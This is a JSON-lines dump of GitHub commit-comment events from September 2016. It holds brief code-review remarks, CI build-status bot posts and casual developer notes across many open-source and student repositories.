{"id":"4558348220","type":"CommitCommentEvent","actor":{"login":"jafdy"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19008973,"position":null,"line":null,"path":null,"commit_id":"5c712cc4ce9a8a59e97cc6c838518a3829594e4a","created_at":"2016-09-13T21:18:37Z","updated_at":"2016-09-13T21:18:37Z","body":"If you put an event in a `on complete` of `Wanderers Ap'arak 3: Pug` you could get that effect."}},"created_at":"2016-09-13T21:18:37Z"}
{"id":"4558350992","type":"CommitCommentEvent","actor":{"login":"bumblebritches57"},"repo":{"name":"lvandeve/lodepng"},"payload":{"comment":{"id":19008981,"position":null,"line":null,"path":null,"commit_id":"ac8f8863c609f34b69d629ed72d6a234afeb11d5","created_at":"2016-09-13T21:19:07Z","updated_at":"2016-09-13T21:19:07Z","body":"Why instead?"}},"created_at":"2016-09-13T21:19:07Z"}
{"id":"4558356493","type":"CommitCommentEvent","actor":{"login":"Nukem9"},"repo":{"name":"Nukem9/LinkerMod"},"payload":{"comment":{"id":19008998,"position":11,"line":10,"path":"components/game_mod/common.cpp","commit_id":"5b844fd6f387c3d3b39155bf264fe330283deae3","created_at":"2016-09-13T21:20:09Z","updated_at":"2016-09-13T21:20:09Z","body":"That's not how it works. `strstr` will find the +extconsole anywhere in the string. `strcmp` will only checking the first part."}},"created_at":"2016-09-13T21:20:09Z"}
{"id":"4558358594","type":"CommitCommentEvent","actor":{"login":"wluyima"},"repo":{"name":"vshl/openmrs-core"},"payload":{"comment":{"id":19009004,"position":null,"line":null,"path":null,"commit_id":"ad49cd14bfe2006f6271d81a147874b0fea53296","created_at":"2016-09-13T21:20:29Z","updated_at":"2016-09-13T21:20:29Z","body":"Since you have altered the tables, you need to update the test data entries too, you need to look at the actual failing tests to know which files contain the datasets you need to update, you can see these at the start of a failing test method or a method annotated with @Before"}},"created_at":"2016-09-13T21:20:29Z"}
{"id":"4558359373","type":"CommitCommentEvent","actor":{"login":"mtwebster"},"repo":{"name":"linuxmint/Cinnamon"},"payload":{"comment":{"id":19009006,"position":null,"line":null,"path":null,"commit_id":"b9344bb9829a3a2e8d886e60eda7d6dd64360a53","created_at":"2016-09-13T21:20:38Z","updated_at":"2016-09-13T21:20:38Z","body":"I'm gonna revert this - we're trying to come up with a better implementation - it's an issue in our new screensaver also."}},"created_at":"2016-09-13T21:20:38Z"}
{"id":"4558362921","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19009016,"position":null,"line":null,"path":null,"commit_id":"c375f61b4330afb96249736bb7b3c5b51b03c272","created_at":"2016-09-13T21:21:17Z","updated_at":"2016-09-13T21:21:17Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#ZxLWmx2dT2iXCF16KqKbyw"}},"created_at":"2016-09-13T21:21:17Z"}
{"id":"4558368724","type":"CommitCommentEvent","actor":{"login":"mleanos"},"repo":{"name":"meanjs/mean"},"payload":{"comment":{"id":19009033,"position":27,"line":14,"path":"modules/users/client/css/users.css","commit_id":"c2cfc388bf69f6bb974a8756bcfbf250b28f10ea","created_at":"2016-09-13T21:22:21Z","updated_at":"2016-09-13T21:22:21Z","body":"@hyperreality Why was this added here? The \"remove\" account buttons aren't working for me on the Manage Social Accounts view. If I remove this line, they work again."}},"created_at":"2016-09-13T21:22:21Z"}
{"id":"4558379252","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19009051,"position":10,"line":612,"path":"test/components/navigationBarTest.js","commit_id":"bcc103a582ba886ffc1b2c9c5ad4e91eb615fd74","created_at":"2016-09-13T21:24:23Z","updated_at":"2016-09-13T21:24:23Z","body":"that test does pass in travis now but it may just be timeout luck. https://travis-ci.org/brave/browser-laptop/builds/159707875"}},"created_at":"2016-09-13T21:24:23Z"}
{"id":"4558380011","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19009053,"position":null,"line":null,"path":null,"commit_id":"b057e2995c54a1446b9acd68434628441a313008","created_at":"2016-09-13T21:24:31Z","updated_at":"2016-09-13T21:24:31Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b057e2995c54a1446b9acd68434628441a313008-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b057e2995c54a1446b9acd68434628441a313008-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T21:24:31Z"}
{"id":"4558386389","type":"CommitCommentEvent","actor":{"login":"jtotoole"},"repo":{"name":"Parsely/wp-parsely"},"payload":{"comment":{"id":19009065,"position":11,"line":259,"path":"tests/test-wp-parsely.php","commit_id":"de0e21b3c32e453be63dda564439018158eaec6c","created_at":"2016-09-13T21:25:43Z","updated_at":"2016-09-13T21:25:43Z","body":"Lines 258 and 259 aren't necessary"}},"created_at":"2016-09-13T21:25:43Z"}
{"id":"4558392535","type":"CommitCommentEvent","actor":{"login":"lkraav"},"repo":{"name":"Automattic/sensei"},"payload":{"comment":{"id":19009094,"position":5,"line":7,"path":"woothemes-sensei.php","commit_id":"35432ca7609f7d0f8e8aae105d299d8513e77f12","created_at":"2016-09-13T21:26:51Z","updated_at":"2016-09-13T21:26:51Z","body":"Yo yo, why would you be removing the plugin level Version tag?"}},"created_at":"2016-09-13T21:26:51Z"}
{"id":"4558405253","type":"CommitCommentEvent","actor":{"login":"Sirhc95"},"repo":{"name":"CypherOS/packages_apps_Settings"},"payload":{"comment":{"id":19009142,"position":null,"line":null,"path":null,"commit_id":"3cc89e10291ba8ae83e2eccad17448f8a7050bad","created_at":"2016-09-13T21:29:13Z","updated_at":"2016-09-13T21:29:13Z","body":"Fixed thanks!"}},"created_at":"2016-09-13T21:29:13Z"}
{"id":"4558406704","type":"CommitCommentEvent","actor":{"login":"TheLarkInn"},"repo":{"name":"rileyjshaw/pride-and-prejudice"},"payload":{"comment":{"id":19009147,"position":null,"line":null,"path":null,"commit_id":"99156ee293baa2b54d0cfc881f52c4b58cc5b1cd","created_at":"2016-09-13T21:29:27Z","updated_at":"2016-09-13T21:29:27Z","body":"If you ever need webpack help just drop by our repo :) or gitter ❤️👏👏👏👏"}},"created_at":"2016-09-13T21:29:27Z"}
{"id":"4558411161","type":"CommitCommentEvent","actor":{"login":"capaj"},"repo":{"name":"trueadm/inferno"},"payload":{"comment":{"id":19009169,"position":null,"line":null,"path":null,"commit_id":"c898e56b437c42701cadba42f2e5d79ec715cba1","created_at":"2016-09-13T21:30:17Z","updated_at":"2016-09-13T21:30:17Z","body":":+1: "}},"created_at":"2016-09-13T21:30:17Z"}
{"id":"4558415359","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19009186,"position":null,"line":null,"path":null,"commit_id":"c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7","created_at":"2016-09-13T21:31:03Z","updated_at":"2016-09-13T21:31:03Z","body":"empd_bugfix (nmerket) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1188 of 1188 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.97%25-green.svg)</a>\n"}},"created_at":"2016-09-13T21:31:03Z"}
{"id":"4558422405","type":"CommitCommentEvent","actor":{"login":"rfalsafi1373"},"repo":{"name":"rfalsafi1373/tryagain3"},"payload":{"comment":{"id":19009206,"position":2,"line":2,"path":"README.md","commit_id":"9f7b31c9f8436cd8a4926ce3618d6b07f89bb5a3","created_at":"2016-09-13T21:32:24Z","updated_at":"2016-09-13T21:32:24Z","body":"new line"}},"created_at":"2016-09-13T21:32:24Z"}
{"id":"4558424862","type":"CommitCommentEvent","actor":{"login":"enigmaquip"},"repo":{"name":"mrkite/TerraFirma"},"payload":{"comment":{"id":19009219,"position":null,"line":null,"path":null,"commit_id":"e067f580d933701d866c0db7bcdeb7d8eb6a8ad6","created_at":"2016-09-13T21:32:51Z","updated_at":"2016-09-13T21:32:51Z","body":"Never gonna believe this.... another bugfix.... 1.3.3.2..... no world version change!"}},"created_at":"2016-09-13T21:32:51Z"}
{"id":"4558436744","type":"CommitCommentEvent","actor":{"login":"Gzopel"},"repo":{"name":"Gzopel/rabbits3d-client"},"payload":{"comment":{"id":19009261,"position":20,"line":20,"path":"views/animationFrame.js","commit_id":"3cf10ca893122f356efd7b369fa83a84ed7c6447","created_at":"2016-09-13T21:35:07Z","updated_at":"2016-09-13T21:35:07Z","body":"Root Component includes the router and devtools, things that aren't relevant and burden the render process."}},"created_at":"2016-09-13T21:35:07Z"}
{"id":"4558440328","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19009273,"position":null,"line":null,"path":null,"commit_id":"641c3a9f93b4c0c91f930aa8f9eb0f9626298526","created_at":"2016-09-13T21:35:45Z","updated_at":"2016-09-13T21:35:45Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (2332 of 2335 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: ZSZ big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-641c3a9f93b4c0c91f930aa8f9eb0f9626298526-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-641c3a9f93b4c0c91f930aa8f9eb0f9626298526-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-13T21:35:45Z"}
{"id":"4558452769","type":"CommitCommentEvent","actor":{"login":"cyberblast"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":19009310,"position":null,"line":null,"path":null,"commit_id":"8e0bb60f371489e6792d0cc5a2949cf825a8eb05","created_at":"2016-09-13T21:38:11Z","updated_at":"2016-09-13T21:38:11Z","body":"Also includes #151 \r\nSorry, mixed it up :/ \r\n\r\nWill surely require some refactoring, but functionally working. \r\nMay be tested.."}},"created_at":"2016-09-13T21:38:11Z"}
{"id":"4558461943","type":"CommitCommentEvent","actor":{"login":"Gzopel"},"repo":{"name":"Gzopel/rabbits3d-client"},"payload":{"comment":{"id":19009337,"position":31,"line":31,"path":"views/animationFrame.js","commit_id":"3cf10ca893122f356efd7b369fa83a84ed7c6447","created_at":"2016-09-13T21:39:57Z","updated_at":"2016-09-13T21:39:57Z","body":"Was thinking about including it on the game container, since it affect is directly.\r\nAlso we could add to the game state a videoConf including things such as target fps."}},"created_at":"2016-09-13T21:39:57Z"}
{"id":"4558478625","type":"CommitCommentEvent","actor":{"login":"MrMC"},"repo":{"name":"koying/SPMC"},"payload":{"comment":{"id":19009405,"position":null,"line":null,"path":null,"commit_id":"2ea6ae1596637d495e57078301f87e1e670c6bc3","created_at":"2016-09-13T21:43:19Z","updated_at":"2016-09-13T21:43:19Z","body":"is use_ndk \"AC_SUBST(use_ndk)\" even used anywhere ? "}},"created_at":"2016-09-13T21:43:19Z"}
{"id":"4558479813","type":"CommitCommentEvent","actor":{"login":"neelb"},"repo":{"name":"SCDevy/blackbird"},"payload":{"comment":{"id":19009406,"position":15,"line":15,"path":"download/usceats.html","commit_id":"2ea67eb1bd1c2380af4a330a7eae82eda18a815d","created_at":"2016-09-13T21:43:33Z","updated_at":"2016-09-13T21:43:33Z","body":"Is it possible to have this default to a blank webpage with two logos (https://developer.apple.com/app-store/marketing/guidelines/#downloadOnAppstore) and https://play.google.com/intl/en_us/badges/"}},"created_at":"2016-09-13T21:43:33Z"}
{"id":"4558481634","type":"CommitCommentEvent","actor":{"login":"jtotoole"},"repo":{"name":"Parsely/wp-parsely"},"payload":{"comment":{"id":19009414,"position":41,"line":365,"path":"wp-parsely.php","commit_id":"de0e21b3c32e453be63dda564439018158eaec6c","created_at":"2016-09-13T21:43:54Z","updated_at":"2016-09-13T21:43:54Z","body":"I'd capitalize \"amp\" and link it to https://www.ampproject.org/. We also ought to link to the plugin page on WordPress (https://wordpress.org/plugins/amp/) as opposed to the `amp-wp` GitHub repo. The beginning of the second sentence, I think, should be rephrased to \"Have a look at <a href='https://www.parsely.com/help/integration/google-amp/'>Parse.ly's documentation</a> for more information on AMP tracking, or...\" The instructions there won't aren't necessary for WordPress users as they don't have to do the configuration themselves, though they may simply provide some context.\r\n"}},"created_at":"2016-09-13T21:43:54Z"}
{"id":"4558483369","type":"CommitCommentEvent","actor":{"login":"iamstarkov"},"repo":{"name":"yakhinvadim/longman-to-anki-web"},"payload":{"comment":{"id":19009418,"position":9,"line":5,"path":"src/utils/composeQuery/composeQuery.js","commit_id":"d5bb2ac4a823c78ac64940c1f3df18fba1b182c9","created_at":"2016-09-13T21:44:15Z","updated_at":"2016-09-13T21:44:15Z","body":"https://nodejs.org/api/querystring.html"}},"created_at":"2016-09-13T21:44:15Z"}
{"id":"4558484147","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19009419,"position":null,"line":null,"path":null,"commit_id":"09f23dc21d0c091b03b51a09ecc1d7e564cf9165","created_at":"2016-09-13T21:44:24Z","updated_at":"2016-09-13T21:44:24Z","body":"The following doc(s) have been deployed to the [1881kalabo](https://1881kalabo-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/kalabox](https://1881kalabo-static-docs.pantheonsite.io/docs/kalabox)\n- [docs/local-development](https://1881kalabo-static-docs.pantheonsite.io/docs/local-development)\n"}},"created_at":"2016-09-13T21:44:24Z"}
{"id":"4558486308","type":"CommitCommentEvent","actor":{"login":"ROBOJR"},"repo":{"name":"ROBOJR/hello-friends"},"payload":{"comment":{"id":19009423,"position":null,"line":null,"path":null,"commit_id":"3d099b100f1fcdf228962711f4a9edad0ab7c50d","created_at":"2016-09-13T21:44:49Z","updated_at":"2016-09-13T21:44:49Z","body":"not for mean people"}},"created_at":"2016-09-13T21:44:49Z"}
{"id":"4558492150","type":"CommitCommentEvent","actor":{"login":"esoergel"},"repo":{"name":"dimagi/commcare-hq"},"payload":{"comment":{"id":19009439,"position":7,"line":14,"path":"corehq/apps/locations/const.py","commit_id":"9581d08f22b8645503a287256970252b39206e0f","created_at":"2016-09-13T21:45:52Z","updated_at":"2016-09-13T21:45:52Z","body":"@sravfeyn I was just trying out the new upload with Talbot, and it currently requires you to include `data` and `uncategorized_data` columns.  What do you think about making some of these columns optional?  I think latitude, longitude, data, and uncategorized_data should all be optional.   "}},"created_at":"2016-09-13T21:45:52Z"}
{"id":"4558495770","type":"CommitCommentEvent","actor":{"login":"lindsaymarkward"},"repo":{"name":"AdamBorg/PracCP1404"},"payload":{"comment":{"id":19009445,"position":17,"line":17,"path":"Prac04/Quick_Pick.py","commit_id":"14d6b58c45fc2b019a14c9501b236141e45b21b8","created_at":"2016-09-13T21:46:36Z","updated_at":"2016-09-13T21:46:36Z","body":"Why do you need `used_numbers`? Can't you just use `numbers_list`?"}},"created_at":"2016-09-13T21:46:36Z"}
{"id":"4558497302","type":"CommitCommentEvent","actor":{"login":"mikiajkoviq"},"repo":{"name":"mikiajkoviq/Hello-World"},"payload":{"comment":{"id":19009449,"position":null,"line":null,"path":null,"commit_id":"5a62ed81f7a3d211e107dc748368e668d497004e","created_at":"2016-09-13T21:46:53Z","updated_at":"2016-09-13T21:46:53Z","body":"Can somebody give me an idea of a project and help me with it ?"}},"created_at":"2016-09-13T21:46:53Z"}
{"id":"4558497585","type":"CommitCommentEvent","actor":{"login":"lindsaymarkward"},"repo":{"name":"AdamBorg/PracCP1404"},"payload":{"comment":{"id":19009451,"position":22,"line":22,"path":"Prac04/Quick_Pick.py","commit_id":"14d6b58c45fc2b019a14c9501b236141e45b21b8","created_at":"2016-09-13T21:46:56Z","updated_at":"2016-09-13T21:46:56Z","body":"Doesn't look like you've tried to line them up. Use `.format()`"}},"created_at":"2016-09-13T21:46:56Z"}
{"id":"4558497960","type":"CommitCommentEvent","actor":{"login":"iamstarkov"},"repo":{"name":"yakhinvadim/longman-to-anki-web"},"payload":{"comment":{"id":19009452,"position":27,"line":27,"path":"src/utils/getCorrectUrls.js","commit_id":"9d5f61cea93934e22e4da825a4a97eb0a8b10afe","created_at":"2016-09-13T21:47:01Z","updated_at":"2016-09-13T21:47:01Z","body":"map?"}},"created_at":"2016-09-13T21:47:01Z"}
{"id":"4558507587","type":"CommitCommentEvent","actor":{"login":"lindsaymarkward"},"repo":{"name":"AdamBorg/PracCP1404"},"payload":{"comment":{"id":19009495,"position":30,"line":30,"path":"Prac04/numbers.py","commit_id":"14d6b58c45fc2b019a14c9501b236141e45b21b8","created_at":"2016-09-13T21:48:56Z","updated_at":"2016-09-13T21:48:56Z","body":"Did you test this? `[3:]` starts from the 4th number."}},"created_at":"2016-09-13T21:48:56Z"}
{"id":"4558511424","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19009521,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-13T21:49:42Z","updated_at":"2016-09-13T21:49:42Z","body":"@pb00068 : was it intended in your pin-aware-SEE code that the _pinners_ could have zero, one, two... or more blockers in between? In other words, the current code in master also has direct checkers in the _pinners_ parameter."}},"created_at":"2016-09-13T21:49:42Z"}
{"id":"4558518853","type":"CommitCommentEvent","actor":{"login":"lindsaymarkward"},"repo":{"name":"AdamBorg/PracCP1404"},"payload":{"comment":{"id":19009537,"position":23,"line":23,"path":"Prac05/Walkthrough.py","commit_id":"14d6b58c45fc2b019a14c9501b236141e45b21b8","created_at":"2016-09-13T21:51:15Z","updated_at":"2016-09-13T21:51:15Z","body":"{:6} is redundant; doesn't do anything since the names are longer than 6."}},"created_at":"2016-09-13T21:51:15Z"}
{"id":"4558522615","type":"CommitCommentEvent","actor":{"login":"lindsaymarkward"},"repo":{"name":"AdamBorg/PracCP1404"},"payload":{"comment":{"id":19009553,"position":16,"line":16,"path":"Prac05/do-from-scratch.py","commit_id":"14d6b58c45fc2b019a14c9501b236141e45b21b8","created_at":"2016-09-13T21:51:59Z","updated_at":"2016-09-13T21:51:59Z","body":"Well done. \r\n`int()` is redundant since `max()` returns an int."}},"created_at":"2016-09-13T21:51:59Z"}
{"id":"4558524964","type":"CommitCommentEvent","actor":{"login":"lindsaymarkward"},"repo":{"name":"AdamBorg/PracCP1404"},"payload":{"comment":{"id":19009563,"position":4,"line":4,"path":"Prac05/do-from-scratch.py","commit_id":"14d6b58c45fc2b019a14c9501b236141e45b21b8","created_at":"2016-09-13T21:52:29Z","updated_at":"2016-09-13T21:52:29Z","body":"Don't use ALL_CAPS unless it's a constant. (STATE_NAMES was a constant)"}},"created_at":"2016-09-13T21:52:29Z"}
{"id":"4558529967","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19009571,"position":10,"line":612,"path":"test/components/navigationBarTest.js","commit_id":"bcc103a582ba886ffc1b2c9c5ad4e91eb615fd74","created_at":"2016-09-13T21:53:30Z","updated_at":"2016-09-13T21:53:30Z","body":"I'm worried about leaving the blank check because the functionality could break and the test wouldn't. Can we either load a different url (page1 for instance) first so we have a consistent url to check for?"}},"created_at":"2016-09-13T21:53:30Z"}
{"id":"4558533144","type":"CommitCommentEvent","actor":{"login":"adamnovak"},"repo":{"name":"adamnovak/vg"},"payload":{"comment":{"id":19009580,"position":null,"line":null,"path":null,"commit_id":"8d61ac731f078a8f8b7b3ccff8f193ec1dd05455","created_at":"2016-09-13T21:54:10Z","updated_at":"2016-09-13T21:54:10Z","body":"I think what we really want is (C++?) unit tests to make sure the\ntranslations are correct for simple cases where one can manually work out\nwhat they are supposed to be. The sort of end-to-end\ndon't-let-anything-change test we have/had just tells us that nothing's\nchanged, not that the answers are really correct.\n\nOn Tue, Sep 13, 2016 at 12:33 PM, Erik Garrison <notifications@github.com>\nwrote:\n\n> I don't think we can keep the full translations around. They will keep\n> shifting and every shift will have to be recorded in the repository. It is\n> enough IMO to verify that the translation looks sane. I guess this can be\n> tested too by projecting alignments through it?\n>\n> On Tue, Sep 13, 2016, 20:25 adamnovak <notifications@github.com> wrote:\n>\n> > Change test results for vg mod expected translation\n> >\n> > @ekg I'm not sure that this is right; a different translation is\n> > definitelty being output, with none of the new mappings having any\n> > sequences set. But I don't know enough about why the old translations\n> > were like they were to really dig in and see if the new results (maybe\n> > from a different set of alignments?) are worse.\n> >\n> > --\n> > You are receiving this because you were mentioned.\n> > Reply to this email directly or view it on GitHub:\n> >\n> > https://github.com/adamnovak/vg/commit/8d61ac731f078a8f8b7b3ccff8f193\n> ec1dd05455\n> >\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/adamnovak/vg/commit/8d61ac731f078a8f8b7b3ccff8f193ec1dd05455#commitcomment-19007390>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AE0_X68Gh5BV93Z8QI_Ku6-ZmR0bvZC6ks5qpvqLgaJpZM4J7_SW>\n> .\n>\n"}},"created_at":"2016-09-13T21:54:10Z"}
{"id":"4558571130","type":"CommitCommentEvent","actor":{"login":"adrian-prantl"},"repo":{"name":"adrian-prantl/swift"},"payload":{"comment":{"id":19009691,"position":19,"line":576,"path":"lib/Sema/TypeCheckType.cpp","commit_id":"ceb67554ba0f80cd17bf2dac3ba0e1525f02d253","created_at":"2016-09-13T22:01:48Z","updated_at":"2016-09-13T22:01:48Z","body":"Only if it happens to be a nominal type. But if it is something like this:\r\n  typealias Pair<T> = (T, T)\r\nwe can't."}},"created_at":"2016-09-13T22:01:48Z"}
{"id":"4558580233","type":"CommitCommentEvent","actor":{"login":"karolherbst"},"repo":{"name":"karolherbst/mesa"},"payload":{"comment":{"id":19009722,"position":30,"line":2557,"path":"src/gallium/drivers/nouveau/codegen/nv50_ir_lowering_nvc0.cpp","commit_id":"6b5c0be3bbaac457129b7796f3ba359a1f728a5d","created_at":"2016-09-13T22:03:41Z","updated_at":"2016-09-13T22:03:41Z","body":"1.0f"}},"created_at":"2016-09-13T22:03:41Z"}
{"id":"4558581575","type":"CommitCommentEvent","actor":{"login":"pixelzoom"},"repo":{"name":"phetsims/query-string-machine"},"payload":{"comment":{"id":19009724,"position":null,"line":null,"path":null,"commit_id":"6722aed20e4fbdea28080d1488a7436891aa0f94","created_at":"2016-09-13T22:03:58Z","updated_at":"2016-09-13T22:03:58Z","body":"#2"}},"created_at":"2016-09-13T22:03:58Z"}
{"id":"4558584027","type":"CommitCommentEvent","actor":{"login":"Anil479"},"repo":{"name":"Anil479/AWS_WebpageHosting"},"payload":{"comment":{"id":19009732,"position":null,"line":null,"path":null,"commit_id":"b719e7441fbe84bf774d69289c679fd97fc0e0cc","created_at":"2016-09-13T22:04:29Z","updated_at":"2016-09-13T22:04:29Z","body":"Step by step coding"}},"created_at":"2016-09-13T22:04:29Z"}
{"id":"4558585757","type":"CommitCommentEvent","actor":{"login":"WhiteCoreWebUI"},"repo":{"name":"Virtual-Universe/Virtual-Dev"},"payload":{"comment":{"id":19009735,"position":null,"line":null,"path":null,"commit_id":"6a3fd2e62f4f108feec8fe69d96a4ebc84a0b33c","created_at":"2016-09-13T22:04:53Z","updated_at":"2016-09-13T22:04:53Z","body":"Cool you added the Explanation to the .ini i was to lazy to do that since i used it only for the time being :P"}},"created_at":"2016-09-13T22:04:53Z"}
{"id":"4558589639","type":"CommitCommentEvent","actor":{"login":"SeanTAllen"},"repo":{"name":"ponylang/ponyc"},"payload":{"comment":{"id":19009742,"position":null,"line":null,"path":null,"commit_id":"e56075d46d7d9e1d8c5e8be7ed0506ad2de98734","created_at":"2016-09-13T22:05:37Z","updated_at":"2016-09-13T22:05:37Z","body":"This is causing a bug, see #1212 "}},"created_at":"2016-09-13T22:05:37Z"}
{"id":"4558594112","type":"CommitCommentEvent","actor":{"login":"Elmo337"},"repo":{"name":"mangoszero/server"},"payload":{"comment":{"id":19009755,"position":null,"line":null,"path":null,"commit_id":"cdd3489f08028e48fad6dfaf1254f441855610ee","created_at":"2016-09-13T22:06:36Z","updated_at":"2016-09-13T22:06:36Z","body":"@billy1arm - ive complete deleted the source from my Server and cloned it new, now its working, little bit wierd. But thank you anyway"}},"created_at":"2016-09-13T22:06:36Z"}
{"id":"4558604956","type":"CommitCommentEvent","actor":{"login":"jrbenito"},"repo":{"name":"2factorauth/twofactorauth"},"payload":{"comment":{"id":19009773,"position":null,"line":null,"path":null,"commit_id":"70e5f0414c2770442b4be61f6ed1d6557541fdb7","created_at":"2016-09-13T22:09:01Z","updated_at":"2016-09-13T22:09:01Z","body":"I looked to documentation pointed and also inside eBay and could not find any reference to software token, just keyfob hardware token. Maybe this is an outdated information."}},"created_at":"2016-09-13T22:09:01Z"}
{"id":"4558609239","type":"CommitCommentEvent","actor":{"login":"tobert"},"repo":{"name":"nlopes/slack"},"payload":{"comment":{"id":19009782,"position":null,"line":null,"path":null,"commit_id":"a8ceb9de0aca0376b293f159bbfb8a6aac72fade","created_at":"2016-09-13T22:09:57Z","updated_at":"2016-09-13T22:09:57Z","body":"Can Ts be a string like the other timestamps in the API? It seems to be intentionally sent as a string rather than a JSON number (float). Forcing it into int64 is going to truncate the timestamps received from Slack and make it impossible to send floats (probably not a big deal though). Consistency seems like the way to go."}},"created_at":"2016-09-13T22:09:57Z"}
{"id":"4558617198","type":"CommitCommentEvent","actor":{"login":"AhmetHamzaEmra"},"repo":{"name":"AhmetHamzaEmra/hello-world"},"payload":{"comment":{"id":19009802,"position":null,"line":null,"path":null,"commit_id":"39e9a65a9f458d0d6398e09e324c4da3b8ccd372","created_at":"2016-09-13T22:11:39Z","updated_at":"2016-09-13T22:11:39Z","body":"# hello-world \r\n\r\nMy first repository on Github\r\nI love :coffee: :pizza: and :dancer: "}},"created_at":"2016-09-13T22:11:39Z"}
{"id":"4558618239","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19009804,"position":null,"line":null,"path":null,"commit_id":"a3519b3ee65a5289f20a4efa89fe886d1aa84cfe","created_at":"2016-09-13T22:11:52Z","updated_at":"2016-09-13T22:11:52Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a3519b3ee65a5289f20a4efa89fe886d1aa84cfe-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a3519b3ee65a5289f20a4efa89fe886d1aa84cfe-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T22:11:52Z"}
{"id":"4558621407","type":"CommitCommentEvent","actor":{"login":"The-Sickness"},"repo":{"name":"Maqical/Firestorm"},"payload":{"comment":{"id":19009810,"position":null,"line":null,"path":null,"commit_id":"9b08c51809cc06655d010e576ec9a5d0acc816f8","created_at":"2016-09-13T22:12:30Z","updated_at":"2016-09-13T22:12:30Z","body":"That's adjustment to GPU voltage"}},"created_at":"2016-09-13T22:12:30Z"}
{"id":"4558632944","type":"CommitCommentEvent","actor":{"login":"cyberblast"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":19009825,"position":null,"line":null,"path":null,"commit_id":"8e0bb60f371489e6792d0cc5a2949cf825a8eb05","created_at":"2016-09-13T22:15:01Z","updated_at":"2016-09-13T22:15:01Z","body":"Got some ERR_NOT_FOUND here and there. And CPU is worse :/"}},"created_at":"2016-09-13T22:15:01Z"}
